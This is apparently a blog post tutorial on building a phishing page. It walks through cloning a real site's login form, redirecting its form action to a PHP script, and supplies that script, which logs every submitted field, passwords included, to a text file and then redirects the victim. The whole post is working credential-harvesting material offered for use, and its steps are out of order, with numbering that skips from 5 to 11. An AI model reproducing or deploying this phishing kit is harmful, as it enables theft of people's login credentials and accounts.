Make Your Own Phishing Site
Hello Friends

Tired Of Searching For Those Phishing Files

How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps

Here Is The Tutorial


1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html

3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"



4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method

Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html


11. Save This File write.php, And Upload It To The Subdomain Aswell

12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,

ENJOY!!!!


Open The index,html File In Notepad And Press CTRL+F

You Will See A Box

Type Action And Press Enter

It Will show U The Word


there You Will See 2 Options

Up And Down

Select Up

Then Enter


Code For Write.php File



<*?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Remove The * Symbol From The Start Of The Code
   
0 Responses
  • Followers

back to top